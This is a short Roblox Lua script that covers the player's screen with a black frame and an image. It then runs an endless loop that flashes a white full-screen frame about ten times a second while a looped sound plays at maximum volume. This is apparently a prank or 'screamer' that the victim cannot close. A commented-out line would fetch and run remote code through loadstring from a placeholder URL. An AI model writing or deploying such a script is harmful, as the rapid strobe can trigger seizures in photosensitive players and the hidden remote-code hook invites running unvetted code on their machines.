local ScreenGui = Instance.new("ScreenGui")
local ImageLabel = Instance.new("ImageLabel")
local Frame = Instance.new("Frame")
local Farm = Instance.new("Frame")

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

ImageLabel.Parent = ScreenGui
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BorderSizePixel = 0
ImageLabel.Position = UDim2.new(0.200155154, 0, 0, 0)
ImageLabel.Size = UDim2.new(0, 773, 0, 773)
ImageLabel.ZIndex = 2
ImageLabel.Image = "rbxassetid://7307708177"

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Frame.Position = UDim2.new(-0.214895263, 0, -0.139715388, 0)
Frame.Size = UDim2.new(0, 5000, 0, 5000)

Farm.Name = "Farm"
Farm.Parent = ScreenGui
Farm.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Farm.BackgroundTransparency = 0.450
Farm.Position = UDim2.new(-0.0806827024, 0, -0.109961189, 0)
Farm.Size = UDim2.new(0, 5000, 0, 5000)
Farm.Visible = false
Farm.ZIndex = 3

s = Instance.new("Sound")
s.SoundId = 9125712561

local function load()
	local script = Instance.new('LocalScript', Farm)
	--loadstring.load("https://github/raw/824u87euhew")
	local farm = script.Parent
	local s = Instance.new("Sound")
	s.SoundId = "rbxassetid://9125712561"
	s.Looped = true
	s.Parent = game.Workspace
	s.Volume = 10
	s:Play()
	while true do
		farm.Visible = true
		task.wait(0.05)
		farm.Visible = false
		task.wait(0.05)
	end
end
coroutine.wrap(load)()
